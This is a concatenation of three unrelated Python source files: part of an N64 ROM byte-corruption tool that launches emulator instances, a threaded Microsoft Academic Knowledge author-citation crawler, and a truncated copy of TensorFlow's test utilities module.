#self.mutate(20, spot=mupen_instances*4 + id-1, step=1)
self.mutate(50, spot=15, step=5)
def mutate(self, mutation_count, spot, step):
'''mutation_count = number of byte changes to make in each instance,
spot = start position, as a percent of total rom length (the first 4096 header bytes are always skipped),
step = length of the range to affect, as a percent of total rom length (overshooting is clamped to the end of the rom)
'''
N = len(self.L) - 1
start_byte = int(max(4096, round((N/100.0)*spot)) )
end_byte = int(min(N, round((N/100.0)*(spot+step))))
self.change_generator(start_byte,end_byte,mutation_count)
print('Mutations: {} at {}% (to {}%) {}-->{} ({})'.format(
mutation_count, spot, min(100, spot+step),
start_byte, end_byte,
1 + end_byte - start_byte))
def save(self, out_dir, basename='generic_filename.n64'):
"""Save corrupted rom and changelist"""
s2 = array.array('B', self.L)
ext_index = basename.rindex('.')
filename = '{}_corrupted_{}{}'.format(basename[0:ext_index],
self.id,
basename[ext_index:])
out_path = os.path.join(out_dir, filename)
print(out_path)
#write the corrupted ROM
with open(out_path, 'wb') as f:
f.write(s2)
#write a textfile where each line is an index (for rom byte), a space, and the new value for that index
with open(out_path + '.changes', 'w') as f:
f.write('\n'.join(' '.join(str(x) for x in tup) for tup in self.changes_made).strip() + '\n')
return out_path
def make_static_changes(self, static_changes_string):
changelist = [[int(x) for x in x.split()] for x in static_changes_string.split('\n') if '#' not in x]
self.changes_made = changelist
print('Static changes (id: {}):'.format(self.id))
for index,new_value in changelist:
old = self.L[index]
self.L[index] = new_value
print(' {}:\t{} --> {}'.format(index, old, new_value))
def change_generator(self, start_byte, end_byte, mutation_count):
self.changes_made = []
for i in range(mutation_count):
index = random.randint(start_byte, end_byte)
change = random.randint(0,255)
self.L[index] = change
#self.L[index] = (self.L[index] + random.randint(1,2)) % 255
self.changes_made.append((index, self.L[index]))
def launch_single(instance_number,corrupted_rom_path):
def calc_instance_position(i):
instances_per_row = (RESW)//instance_res[0]
#X = [0,1,2, ... ,0,1,2,...]*width + pixel_offset
x = (i%instances_per_row)*instance_res[0] + 2*(i%instances_per_row)
#y = height*[0,0,0,...,1,1,1,...,2,2,2,...] + pixel_offset
y = instance_res[1]*(i//instances_per_row) + 2*(i//instances_per_row)
return x,y
res = "%dx%d" % instance_res
pos = "%d,%d" % calc_instance_position(instance_number)
env = os.environ.copy()
env['SDL_VIDEO_WINDOW_POS'] = pos
p = subprocess.Popen(['mupen64plus', '--nosaveoptions', '--resolution', res, corrupted_rom_path], env=env)
#p = subprocess.Popen(['mupen64plus', '--nosaveoptions', '--resolution', res, '--position', pos, corrupted_rom_path])
def launch_many(path_list):
processes = [Process(target=launch_single, args=(i,path)) for (i,path) in enumerate(path_list)]
for p in processes:
p.start()
def generate_corrupted_rom(L, out_dir, rom_path, i):
corruption = Corruption(L, i+1) #start counting from 1
path = corruption.save(out_dir=out_dir, basename=os.path.basename(rom_path))
#free memory as these are not needed after saving
del corruption.L
del corruption.changes_made
return path
def load_rom(rom_path):
with open(rom_path, 'rb') as f:
return list(f.read())
def main(rom_path, changelist):
L = load_rom(rom_path)
if changelist:
corruption = Corruption(L, 'static', changelist)
out_path = corruption.save(out_dir=out_dir, basename=os.path.basename(rom_path))
launch_single(0, out_path)
else:
#generate corruptions first, then launch. Generating takes a while, so launching
#all at once makes them almost synced, so that it is easier to notice differences
pool = Pool(processes=max(2, cpu_count()//2))
func = partial(generate_corrupted_rom, L, out_dir, rom_path)
out_paths = pool.map(func, range(mupen_instances))
time.sleep(1)
launch_many(out_paths)
if __name__ == '__main__':
out_dir = os.path.join( os.path.dirname(argv[0]), 'output_roms', 'ramdisk' )
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if len(argv) > 2:
with open(argv[2]) as f:
static_changes_string = f.read().strip()
else:
static_changes_string = None
in_path = argv[1]
main(in_path, static_changes_string)
|
author.py
|
"""
Test Module
"""
import os
import sys
import json
from os.path import join, dirname
from random import randint
from queue import Queue
from threading import Thread
from time import sleep
from dotenv import load_dotenv
from optparse import IndentedHelpFormatter, OptionGroup, OptionParser
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
try:
import maka
except ImportError:
import inspect
CURRENT_DIR = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
PARENT_DIR = os.path.dirname(CURRENT_DIR)
os.sys.path.insert(0, PARENT_DIR)
import maka
DELAY = 1
NUM_QUERIER_THREADS = 2
ROOT = {'author': None, 'aliases': [], 'articles': []}
THE_QUEUE = Queue()
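# Each item placed on THE_QUEUE is a dict of the form
# {'query_type': <maka.AcademicQueryType>, 'payload': {...}, 'parent': <article id or None>};
# the initial INTERPRET query omits 'parent', and only EVALUATE handling reads it.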
def find_article(article, parent=None):
if parent is not None:
for p in ROOT['articles']:
if p['id'] == parent and p['cites']:
for art in p['cites']:
if art['id'] == article:
return art
else:
for art in ROOT['articles']:
if art['id'] == article:
return art
return None
def querier_enclosure(i, q):
"""
Wrapper for the query procedure in order to be used in a Worker
"""
while True:
print('Worker {}: Looking for the next query'.format(i))
args = q.get()
query = maka.AcademicQuerier(args['query_type'], args['payload'])
if query is not None:
results = query.post()
if results:
if args['query_type'] == maka.AcademicQueryType.INTERPRET:
expr = 'OR({})'.format(','.join([interpretation['rules'][0]['value']
for interpretation in results]))
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.EVALUATE,
'payload': {
'expr': expr,
'attributes': '*'
},
'parent': None
})
elif args['query_type'] == maka.AcademicQueryType.EVALUATE:
parent = args.get('parent', None)
branch = ROOT['articles'] if parent is None else (find_article(parent))['cites']
for result in results:
article = find_article(result['id'], parent)
if article is None:
branch.append(result)
if parent is None:
expr = 'RId={}'.format(result['id'])
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.EVALUATE,
'payload': {
'expr': expr,
'attributes': '*'
},
'parent': result['id']
})
total = len(branch)
if total%50 == 0:
new_payload = args['payload'].copy()
new_payload['offset'] = total
THE_QUEUE.put({
'query_type': args['query_type'],
'payload': new_payload,
'parent': args['parent']
})
q.task_done()
sleep(DELAY)
def main():
"""
The method called when running this script
"""
usage = """author.py --author "albert einstein"
A command-line interface to Microsoft's Academic Knowledge."""
fmt = IndentedHelpFormatter(max_help_position=50, width=100)
parser = OptionParser(usage=usage, formatter=fmt)
group = OptionGroup(parser, 'Query arguments',
'These options define search query arguments and parameters.')
group.add_option('-a', '--author', metavar='AUTHORS', default=None,
help='Author name(s)')
parser.add_option_group(group)
options, _ = parser.parse_args()
# Show help if we have no author name
if len(sys.argv) == 1:
parser.print_help()
return 1
for i in range(NUM_QUERIER_THREADS):
worker = Thread(target=querier_enclosure, args=(i, THE_QUEUE,))
worker.daemon = True
worker.start()
ROOT['author'] = options.author
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.INTERPRET,
'payload': {
'query': 'papers by {}'.format(options.author)
}
})
print('*** Main thread waiting')
THE_QUEUE.join()
with open('{}.json'.format(ROOT['author'].replace(' ', '')), 'w') as outfile:
json.dump(ROOT, outfile, cls=maka.classes.AcademicEncoder, indent=4)
print('*** Done')
if __name__ == "__main__":
sys.exit(main())
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the import in the try block below is made available through the BUILD
# rule, then this function is overridden and will instead return True,
# causing TensorFlow graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
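# Illustrative usage (hypothetical op names in an existing graph `g`):
#   assert_ops_in_graph({"my_const": "Const", "my_add": "Add"}, g)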
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
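# Illustrative example: for a shape array, NHWCToNCHW([2, 8, 8, 3]) returns
# [2, 3, 8, 8]; a 4-D tensor gets the same [0, 3, 1, 2] permutation via
# array_ops.transpose.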
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
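# Illustrative usage (hypothetical test method):
#   @skip_if(lambda: not is_gpu_available())
#   def testNeedsGpu(self):
#     ...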
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifically on macOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
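# Illustrative example:
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# returns
#   [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#    OrderedDict([("mode", "eager"), ("use_gpu", True)])]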
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
